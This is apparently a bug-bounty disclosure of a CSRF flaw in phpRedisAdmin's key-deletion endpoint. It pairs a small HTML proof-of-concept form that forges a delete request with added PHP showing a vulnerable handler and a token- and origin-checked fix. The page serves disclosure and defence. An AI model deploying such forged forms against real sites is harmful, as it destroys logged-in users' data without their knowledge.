Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin

Valid

Reported on

Aug 23rd 2021


✍️ Description

The delete-key functionality in the application (the delete.php endpoint) is vulnerable to a CSRF attack: a forged cross-site POST carrying post=1 and selected_keys is accepted on the strength of the victim's session cookie alone.

🕵️‍♂️ Proof of Concept

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected&#95;keys" value="123&#44;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
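For contrast with the proof of concept above, here is an added example of how a server-side handler for such a delete request can reject forged cross-site submissions. This is illustrative code written for this page, not phpRedisAdmin's own code and not the fix commit referenced below; the function names (csrf_token, csrf_token_is_valid, request_is_same_origin, handle_delete_vulnerable, handle_delete_hardened, render_delete_form) and the expected host are assumptions. The vulnerable shape mirrors the POST fields the PoC sends (post=1, selected_keys); the hardened shape requires a per-session token and a same-origin Origin/Referer check before deleting anything.

```php
<?php
// Added example (not phpRedisAdmin's code): CSRF defence for a key-deletion
// endpoint shaped like the delete.php request in the PoC. Function names and
// the expected host are assumptions made for this illustration.
declare(strict_types=1);

// Layer 1 (defence in depth): SameSite=Lax keeps the session cookie off
// cross-site POSTs in modern browsers. Not sufficient alone.
session_set_cookie_params([
    'lifetime' => 0, 'path' => '/', 'secure' => true,
    'httponly' => true, 'samesite' => 'Lax',
]);
session_start();

// Layer 2: a per-session secret embedded in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token with the session token.
function csrf_token_is_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== ''
        && hash_equals($expected, $submitted);
}

// Layer 3: browsers attach Origin to cross-origin POSTs and a page cannot
// forge it; reject anything that does not name our own host.
function request_is_same_origin(string $expectedHost): bool
{
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? null;
    if ($src === null) {
        return false; // no provenance at all: treat as cross-site
    }
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Vulnerable shape (what the PoC relies on): the handler trusts a POST with
// post=1 and selected_keys purely because a valid session cookie was sent.
function handle_delete_vulnerable(array $post, callable $deleteKeys): bool
{
    if (($post['post'] ?? '') !== '1') {
        return false;
    }
    $keys = array_filter(explode(',', $post['selected_keys'] ?? ''));
    $deleteKeys($keys);
    return true;
}

// Hardened shape: identical behaviour for legitimate users, but the delete
// only proceeds once the token and the origin check both pass.
function handle_delete_hardened(array $post, string $host, callable $deleteKeys): bool
{
    if (($post['post'] ?? '') !== '1') {
        return false;
    }
    if (!csrf_token_is_valid($post['csrf_token'] ?? null)
        || !request_is_same_origin($host)) {
        http_response_code(403);
        return false;
    }
    $keys = array_filter(explode(',', $post['selected_keys'] ?? ''));
    $deleteKeys($keys);
    return true;
}

// The legitimate form must carry the token, or real deletes would also fail.
function render_delete_form(array $keys): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    $list  = htmlspecialchars(implode(',', $keys), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="delete.php?s=1&amp;d=0&amp;batch_del=1">'
         . '<input type="hidden" name="post" value="1">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="hidden" name="selected_keys" value="' . $list . '">'
         . '<button type="submit">Delete</button></form>';
}

// Wiring (illustrative): an attacker-hosted form like the PoC sends no
// csrf_token and a foreign Origin, so the hardened handler returns 403.
if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    handle_delete_hardened($_POST, 'domain.tld', function (array $keys): void {
        // $redis->del(...$keys) would go here; stubbed for the example.
        error_log('would delete: ' . implode(',', $keys));
    });
}
```

The token is the primary control; SameSite=Lax and the Origin check are belt-and-braces, since Lax does not help against a sibling subdomain and some proxies strip Referer. When reviewing a fix for an issue of this kind, look for exactly these three things: a secret tied to the session and compared with hash_equals, the secret actually rendered into the form, and the check placed before the destructive call rather than after it.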

💥 Impact

This vulnerability lets an attacker delete data from the database on behalf of a logged-in user, without that user's knowledge or intent.

Occurrences

3 months ago: We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back.
3 months ago: Erik Dubbelboer confirmed that a fix has been merged on b57e3b.
The fix bounty has been dropped.